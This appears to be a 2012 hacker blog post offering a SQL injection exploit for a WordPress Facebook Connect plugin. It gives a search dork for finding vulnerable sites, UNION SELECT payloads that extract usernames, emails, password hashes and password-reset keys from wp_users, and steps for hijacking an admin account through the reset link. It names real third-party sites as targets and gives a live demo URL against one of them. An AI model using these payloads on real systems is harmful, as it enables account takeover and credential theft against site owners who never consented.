Sunday, 4 November 2012

Wordpress NIce Exploit

Hello PHC rOx RoOT here!! 

Today i post my personal Exploit i hope all of you like this ....  :)


dork    :     inurl:"/?fbconnect_action=myhome"

explit    :  ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email),7,8,9,10,11,12+from+wp_users--

explit2    :    ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)?,7,8,9,10,11,12+from+wp_users--

expoit3    :    http://masaru.ikeda.me/wp-login.php

now the wordpress will ask me for the username or email .. for which i want to reset the password .. in my case that is 'masaru' .. so go ahead and enter the username ..

now look closely .. it says .. "Check your e-mail for the confirmation link."

expoit4    :    ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activation_key)?,7,8,9,10,11,12+from+wp_users--

expoit5    :    wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE

explit6    :    wp-login.php?action=hdBje5ATdgGDgw4Xgkt0&login=martyr

demo:
http://boneramamusic.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29,7,8,9,10,11,12+from+wp_users--
Posted by at No comments:
Subscribe to: Posts (Atom)